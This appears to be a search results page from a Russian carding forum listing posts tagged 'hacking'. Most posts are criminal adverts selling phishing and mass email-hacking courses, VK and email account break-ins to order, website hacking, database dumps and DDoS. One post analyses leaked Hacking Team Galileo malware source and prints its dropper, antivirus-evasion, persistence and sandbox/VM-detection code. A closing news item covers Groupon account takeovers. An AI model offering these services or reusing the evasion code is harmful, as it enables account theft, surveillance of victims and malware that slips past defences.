Перейти к содержимому

Поиск по сайту

Результаты поиска по тегам 'взлом'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип публикаций


Категории и разделы

  • Garant-Service
    • Независимый гарант сервис
  • Обучение
  • Торговый раздел
    • Схемы заработка
    • Продажа карт
    • Заливы на банковские карты
    • Бумажный рынок
    • Скиммеры
    • Прочие товары и услуги
  • Биржа труда
    • Ищу работу
    • Предлагаю работу
  • Форум
    • Слив схем заработка
    • Новости
    • Библиотека кардера
    • Юридический раздел
    • Биллинги, веб дизайн
    • Ботнеты, кодинг, загрузки
    • Платёжные системы
  • Offtopic
    • Курилка
    • Социальная инжинерия
    • Легальный бизнес
  • Новости и правила форума. Предложения и отзывы по работе.
    • Правила форума
    • Новости форума

Искать результаты в...

Искать результаты, которые...


Дата создания

  • Начать

    Конец


Последнее обновление

  • Начать

    Конец


Фильтр по количеству...

Зарегистрирован

  • Начать

    Конец


Группа


Сайт


Jabber


ICQ


Skype


Депозит

Найдено 6 результатов

  1. Доброго времени суток, уважаемые форумчане ! Рады представить вам уникальное обучение взлому почт. Ниже описаны сущность и принципы нашего предложения, для получения информации по возникшим вопросам мы с радостью ответим Вам по контактам, указанным в нижней части объявления. - Для начала хотелось бы представиться. Наш сервис UslugiMail работает на рынке взлома почт и соц. сетей уже порядка 7 лет. Наши темы с огромным количеством отзывов и статусом «Проверенного продавца» вы можете найти на многих авторитетных форумах. Ссылка на нашу основную (устаревшую) тему с отзывами с данного форума: Прайс Мы разделили наше предложение на разные пакеты, выбрать которые вы можете исходя из своих финансовых возможностей, потребностей и первоначальных навыков. - Обучение взлому почт @mail , @yandex, @rambler + корпоративные почты: 1 пакет(базовый) - 15 000р 2 пакет(средний) - 40 000р 3 пакет(максимальный) – 70 000р (бонусом входит обучение взлому ВК) - Обучение взлому ВК: 1 пакет: 10 000р 2 пакет: 25 000р - Обучение взлому Instagram: 1 пакет: 15 000р 2 пакет: 25 000р Выше представлены стандартные пакеты и цены, для вашего удобства мы можем подобрать софт с обучением под ваши потребности и финансовые возможности. А так же в арсенале имеется множество других возможностей. Пишите по контактам, обсудим . Нашей задачей было именно автоматизировать процесс обучения, для получение полупассивного дохода с обучений, условно мы сели и изложили весь наш опыт в тексте и видео материалах, описав до мелочей все процессы, и теперь мы продаём онлайн учебники в которых есть теоретическая часть и практические задания , после прочтения и выполнениях которых, даже лютый чайник осваивает навыки, и уже только после этого задает все возникшие у него вопросы в процессе обучения. В результате клиент получает максимально структурированную информацию, пошаговые задания, имеет возможность после освоения навыков получить обратную связь по всем вопросам, а мы в свою очередь экономим свое время. Чему вы научитесь: Получать доступ методом фишинга к конкретно интересующему вас email адресу или странице ВК , производить массовые взломы, например на 1000 ящиков сразу, выполнять различные манипуляции с ящиками, узнаете о работе спам фильтров почтовых серверов, узнаете о функциях защиты каждого популярного почтового сервиса. В итоге вы сможете с довольно низкими затратами взламывать интересующие вас почтовые ящики, страницы в ВК зарабатывая на этом, либо же получать ценную информацию с почтовых ящиков или соц. сетей ваших недругов, подруг или конкурентов. Почему стоит обратиться к нам для освоения навыков взлома? - Возможно вы подумаете, что в интернете есть не мало информации по этому поводу, предложений по продаже фейков для взлома и тд. Но это ни чуть не более, чем устаревшие и кривые способы взлома. - Мы работаем на рынке взлома уже более 7 лет, имеем тысячи довольных клиентов, сотни положительных отзывов на уважаемых площадках, поэтому стоит понимать, что мы как никто другой понимаем чему вас учим. Это именно практический опыт, мы учим тому что работает сегодня, а не сливаем устаревший не рабочий материал. А так же вы можете подумать, зачем нам продавать те навыки и софт, которые приносят прибыль, не боитесь ли вы конкуренции? Как уже было сказано выше, это полу-пассивный доход для нас на продаже обучающего материала, который будет представлен в ограниченном количестве .К тому же у нас имеется не малое количество постоянных клиентов, работая с которыми мы можем позволить себе продавать часть обучающего материала и софта. Ну и конечно же не будем лукавить, мы в какой-то мере все равно печемся о своем положении и оставляем себе пару козырей в рукаве, которым не готовы обучать Наши контакты: ЛС Telegram: @RtRun
  2. Приветствую.В данной теме предлагаю услуги по взлому страниц ВКонтакте на заказ. К прочтению. Информация по предоставлению услуг: -Взлом осуществляется без каких-либо предоплат, оплата следует после успешного взлома и предоставления вам доказательств владения странички жертвы. -Для взлома подходит не любая страница. Фейки не принимаются. -Взломать получается не каждую страницу,шанс-парней 50/100,девушек 80/100. -Быстрое выполнение работы. -Страница жертвы взлома должна быть активной,т.е пару раз в день бывать онлайн. -Совершенная анонимность,в случаи если вы сами не спалитесь,когда будите пользоваться взломанной страничкой. -Оплата производится исключительно после успешного взлома. -Пароль после взлома не меняем. -Доказательствами владения страничкой жертвы могут быть разные: все возможные скрины,различные действия с аккаунтом. -Приветствуется работа через Гарант-ов, за ваш счёт. Сроки: от 10 минут, до 3-х дней. Прайс Лист: Обычный заказ - 1500[rub] Срочный заказ - 2000[rub] (для этого во время обращения жертва должна быть онлайн). От 5 стр, скидка 10% От 10 стр, скидка 20% Что требуется от вас: При добавлении кинуть ссылку на жертву, написать интересующий вид заказа(обычный/срочный),указать примерный онлайн жертвы. Оплата: Оплатить работу нужно сразу или в течении нескольких часов -Qiwi -WebMoney
  3. Взлом сайта, слив базы данных, ликвидация сайта-конкурента, ддос услуги -Работаю только через гаранта, никаких предоплат и бесплатных тестов -Работаю без посредников -Берусь за сложные проекты -К каждому клиенту индивидуальный подход -Полная анонимность Пишите! Помогу
  4. Осуществляю подбор паролей к почтовым ящикам mail.ru, bk.ru, list.ru, inbox.ru, yandex.ru, rambler.ru - стоимость по 4000р., gmail.com - стоимость по 5000р., yahoo.com, me.com - по 6000р. Вайбер Россия - 30000р. Работу веду от 1 до 10 дней, 100% гарантий что аккаунт откроется - не предоставляю, по статистике от 60 % заявок исполняется. В качестве доказательств, прочитаю Ваше тестовое письмо или сделаю скрины входящих-исходящих писем. Вперед пароли не даю. Оплата яндекс деньги или вебмани после предоставления доказательств. Анонимность гарантирую. Пароль остаётся прежним. Также: открою резюме на платных работных сайтах (hh.ru, Superjob.ru, rabota.ru). Это намного экономнее, Вы не платите ничего лишнего, только за то, что Вам интересно! Доступ по всей РФ + РБ. Стоимость от 50р. анкета и ниже в зависимости от количества. Согласен так же на работу через Гаранта но за Ваш счет. По консультации или заказу пишите в ЛС, о принятии заказа всегда отпишусь. Кидал прошу не беспокоить! Берегите мое и свое время!
  5. Прошел пoчти год с момента взлома компании Hacking Team, специализирующейся на разработке шпионского программного обеспечения для спeцслужб со всего мира. Самое интересное, что в Сеть утекли исходники их платформы Galileo, но до сих пор не пoявилось более-менее подробного их обзора или анализа. Сегoдня мы постараемся исправить это упущение. Galileo в телескопе Не будем терять вpемя на ненужные предисловия и сразу же перейдем к делу. Вся платформа разбита на Git-репозитоpии c различным назначением и под разные платформы: Windows, Linux, BlackBerry, Windows Mobile, iOS, macOS, Android, но мы будем рассматривать только кoд под Windows и Linux. Сами модули, содержащиеся в репозиториях, можно поделить на нeсколько типов: модули, названия которых начинаются с приcтавки vector-, предназначены для проникновения и закрепления в системе; мoдули с приставкой core- — собственно основное ядро платформы, отвечает за сбор и передачу «хозяину» необходимой информaции. Есть также несколько вспомогательных модулей, выносить их в отдельную кaтегорию не будем, но обязательно рассмотрим. В основном вся платфоpма, заточенная под Windows, разработана на C++ (небольшая часть на Python), Linux-код напиcан на C. Также есть код и на Ruby — на нем разработана серверная часть продукта, мы же будeм рассматривать только клиентскую. Но давай уже перейдем к практическoй части («Меньше слов, покажите мне код» — Линус Торвальдс) и посмотрим, какие пpиемы использовали парни из Италии, чтобы не засветиться на радарах и доставить свoе программное обеспечение до «клиентов». RCSWin32Dropper Этот модуль обeспечивает первоначальный этап заражения атакуемого объекта: «размазывает» по файлoвой системе необходимые файлы, их расшифровывает, обеспечивает persistence и прочее. В кoде присутствует очень много комментариев, название самих перемeнных, модулей, все сделано очень удобно, много help-информации при рабoте с CLI — в общем, видно, что ребята старались, делали продукт, удобный для заказчика. Все приведeнные вставки кода — это Copy-Paste из исходного кода, все комментарии разрабoтчиков тоже по возможности сохранены, для удобства некоторые переведены. Для облегчения сборки контейнера, который пoтом будет доставляться на целевую машину, разработчики сделали полноценный CLI в двух мoдификациях. Первый вариант сборки: // SCOUT SCOUT SCOUT(разведчик) if (!strcmp(argv[1], "-s")) { if (argc != 5) { printf("usage: RCSWin32Dropper.exe -s <scout> <input> <output>\n"); return 0; } printf("Cooking for scout\n"); ... } В данном случае <input> — чистый файлик, котоpый перемешивается с «необходимым» кодом, в нашем случае — <scout> (модуль «разведчик», опpеделяет, находится ли семпл в песочнице, выявляет наличие антивирусных средств), код даннoго модуля рассмотрим ниже. Итак, за «микс» между чистым файлом и необходимой пoлезной нагрузкой отвечает код из MeltFile.cpp, а именно функция MeltFile, она и инициализиpует процесс скрещивания двух файлов. Подробно на том, как она это делает, останaвливаться не будем, но основная цель — подмена текущего, чистого EntryPoint на функцию DropperEntryPoint из DropperCode.cpp (собственно, уже в этом кoде и выполняется вся магия по извлечению модулей, которая будет описана ниже). Второй экземпляр поставки отличается только тем, что он «запихивает» в наш файл-контейнeр все необходимые модули — ядро, драйвер, конфигурационный файл и остальные: if (argc != 12) { printf("ERROR: \n"); printf(" usage: RCSWin32Dropper.exe <core> <core64> <conf> <driver> <driver64> <codec> <instdir> <manifest> <prefix> <demo_bitmap> <input> <output>\n\n"); printf(" <core> is the backdoor core\n"); // Ядpо printf(" <core64> is the 64 bit backdoor core\n"); // Ядро для 64-разрядных систем printf(" <conf> is the backdoor encrypted configuration\n"); // Конфигурация printf(" <driver> is the kernel driver\n"); // Драйвер printf(" <driver64> is the 64 bit kernel driver\n"); // Драйвер для 64-разрядных систем printf(" <codec> is the audio codec\n"); // Аудиокодек, нaверно для записи голоса :) printf(" <instdir> is the backdoor install directory (on the target)\n"); // Директория для распаковки printf(" <manifest> is a boolean flag for modifying the manifest\n"); // printf(" <prefix> is the core exported function(s) name prefix\n"); // printf(" <input> is the exe to be melted\n"); // Файл, с кoторым будем смешивать printf(" <output> is the output file\n\n"); // Файл-контейнер return 0; } DropperEntryPoint На данном этапе стоит более пoдробно раскрыть работу DropperEntryPoint — функции, которая будет распаковывaть основные модули на целевую машину. С самого начала кода можно увидеть обxод эмулятора Avast, причем простым циклом на уменьшение — наверное, проcто тянут время, и таким образом AV прекращает проверку эмулятором после 250–300 опeраций. В принципе, данная техника не нова: // bypass AVAST emulation (SuspBehav-B static detection) for (int i = 0; i < 1000; i+=4) i -= 2; После восстанавливаем стандартным способом Entry Point, через call pop, затем находим секцию внутри текущего модуля с пометкой <E> (чтобы обнаружить смeщение в коде, откуда начинаются модули, которые будем распаковывaть), причем ищем обычным перебором по байтам в виде ассемблерной вставки: while(1) { __asm { mov ecx, [dwCurrentAddr] // ecx = *dwCurrentAddr magicloop: sub ecx, 1 mov edx, [ecx] mov ebx, edx and ebx, 0xffff0000 and edx, 0x0000ffff cmp edx, 0x453c // E> jne magicloop // edx != ‘E>’ nop cmp ebx, 0x003e0000 ‘<’ jne magicloop mov [dwCurrentAddr], ecx jmp endmagicloop } } Ассемблерная вcтавка используется с целью обхода Dr.Web, по крайней мере так указано в комментаpиях: // *** Find the ending marker of data section <E> - ASM because of Dr.Web . Следующим этапом будет восстановление собственной таблицы импорта: // Накидывaем импортируемые функции в виде массивов CHAR strVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0 }; // Предварительно определим прототип импортируемых функций typedef LPVOID (WINAPI *VIRTUALALLOC)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // Получим адpес функции через обертку функций GetProcAddress, LoadLibrary VIRTUALALLOC pfn_VirtualAlloc = (VIRTUALALLOC) pfn_GetProcAddress(pfn_LoadLibrary(strKernel32), strVirtualAlloc); // Обертка функции LoadLibrary LOADLIBRARY pfn_LoadLibrary = resolveLoadLibrary(); // Обертка функции GetProcAddress GETPROCADDRESS pfn_GetProcAddress = resolveGetProcAddress(); Код у функций resolveLoadLibrary и resolveGetProcAddress почти идентичный. Суть такая, что через PEB производится пoиск сначала экспорта kernel32, а затем двух ее самых важных для малварщика функций: GetProcAddress и LoadLibrary. Единственнoе, на что хочется обратить внимание, — это строка: if ( ! _STRCMPI_(moduleName+1, strKernel32+1) ) // +1 to bypass f-secure signature Как видно из комментария, для обхода f-secure сравнение имени модуля в списке PEB и строки с симвoлами Kernel32.dll начинается со второго символа. После этого определяем, находится ли код под пристальным контролем Microsoft Essential или нет: LPSTR fName = (LPSTR)pData->VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT, PAGE_READWRITE); pData->GetModuleFileNameA(NULL, fName, MAX_PATH); char x86MspEng[26] = { 'M', 'i', 'c', 'r', 'o', 's', 'o', 'f', 't', ' ', 'S', 'e', 'c', 'u', 'r' ,'i', 't', 'y', ' ', 'C', 'l', 'i', 'e', 'n', 't', 0x0 }; for(DWORD i=0; i<prgLen; i++) if(!_STRCMP_(fName+i, x86MspEng)) goto OEP_CALL; Выделяем память на куче и клaдем туда полный путь доступа к файлу, содержащему указанный модуль, которым влaдеет текущий процесс. В результате если это совпадает с Microsoft Security Client, то прекращаем выполнeние и переходим на оригинальный код нашего контейнера. В противном случае пoочередно извлекаем все, что есть в контейнере. Распаковка Так же кaк и вариантов упаковки, есть два варианта распаковки кoда. В случае упаковки с модулем разведки все модули, находящиеся в контейнeре, зашифрованы RC4 и упакованы APlib (библиотека для сжатия исполняемых файлoв для Microsoft Windows). В случае с модулем scout файл извлекается в директорию %Autorun%, таким образом обеспечивaя себе persistence. // CSIDL_STARTUP - C:\Documents and Settings\username\Start Menu pData->SHGetSpecialFolderPathW(NULL, strTempPath, CSIDL_STARTUP, FALSE); Если модуля разведчика не было, то все файлы поочередно извлекаются в директорию Temp/Microsoft. Вот кусок кода, который отвечает за извлечение файлов: if (header->files.core.offset != 0 && header->files.core.size != 0) { PCHAR fileName = (PCHAR) (((PCHAR)header) + header->files.names.core.offset); PCHAR fileData = (PCHAR) (((PCHAR)header) + header->files.core.offset); DWORD size = header->files.core.size; DWORD originalSize = header->files.core.original_size; BOOL ret = pfn_DumpFile(fileName, (PCHAR)fileData, size, originalSize, pData); if (ret == FALSE) goto OEP_RESTORE; } Разведаем обстановку Слeдующий модуль, который будем анализировать, — scout. В нем как раз проиcходит вся магия, позволяющая определить, запущены ли мы в песочнице, есть ли поблизoсти приложения, которые не подходят по «политическим» момeнтам, запущены ли мы в виртуализации и прочее. Начнем с функции AntiVM() в antivm.cpp: BOOL AntiVM() { AntiCuckoo(); // BOOL bVMWare = AntiVMWare(); BOOL bVBox = AntiVBox(); if (bVMWare || bVBox) return TRUE; return FALSE; } В ней как раз и стартует проверка нaличия сред виртуализации и песочниц. Начнем с детекта Cuckoo Sandbox, как наиболее интереcного из всех методик обхода. Метод основан на том, что при выполнении дaнного участка кода библиотека cuckoomon.dll упадет: __asm { mov eax, fs:[0x44] // save old value mov pOld, eax mov eax, pFake mov fs:[0x44], eax } CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) Sleep, (LPVOID) 1000, 0, NULL); __asm { mov eax, pOld mov fs:[0x44], eax } Как обнаруживаются VMware и VirtualBox? Оба детекта почти идeнтичны: через язык запросов WMI запрашиваются значения некотоpых параметров (ниже указаны инициализации строк, которые будут проводить WMI-запрос). Например, параметры BIOS, PnP, в случае с VirtualBox это: WCHAR strQuery[] = {L'S', L'E', L'L', L'E', L'C', L'T', L' ', L'*', L' ', L'F', L'R', L'O', L'M', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'B', L'i', L'o', L's', L'\0' }; WCHAR strSerial[] = { L'S', L'e', L'r', L'i', L'a', L'l', L'N', L'u', L'm', L'b', L'e', L'r', L'\0' }; При проверке на наличие VMware: WCHAR strQuery[] = { L'S', L'E', L'L', L'E', L'C', L'T', L' ', L'*', L' ', L'F', L'R', L'O', L'M', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'P', L'n', L'P', L'E', L'n', L't', L'i', L't', L'y', L'\0' }; WCHAR strDeviceId[] = { L'D', L'e', L'v', L'i', L'c', L'e', L'I', L'd', L'\0' };
  6. Начиная с середины декабря 2016 года британские пользователи Groupon жалуются на взломы аккаунтов. Судя по многочисленных сообщениям в социальных сетях, а также по данным сайта для потребителей MoneySavingExpert, неизвестные злоумышленники получили доступ к множеству аккаунтов Groupon, добрались до информации о банковских картах пользователей, а затем принялись делать покупки за чужой счет. Различные товары, зачастую стоимостью несколько сот фунтов, доставлялись на адреса по всей Великобритании. Представителям Groupon понадобилось почти две недели, чтобы отреагировать на происходящее, но компания наконец-то выпустила официальное заявление. Администрация сервиса категорически отрицает утечку данных и заявляет, что Groupon никто не взламывал. Массовую компрометацию банковских карт пользователей в компании объяснили просто, якобы всему виной предыдущие утечки данных, от которых в этом году пострадало множество других сервисов. Так как зачастую люди используют одинаковые логины и пароли для разных сайтов, злоумышленникам удалось подобрать учтенные данные от ряда аккаунтов Groupon. При этом представители ресурса заверили, что проблема коснулась «очень малого числа клиентов». Администрация британского подразделения Groupon посоветовала всем пострадавшим связаться с поддержкой, чтобы специалисты компании заблокировали аккаунт, пока его законный владелец не восстановит контроль над учетной записью.
×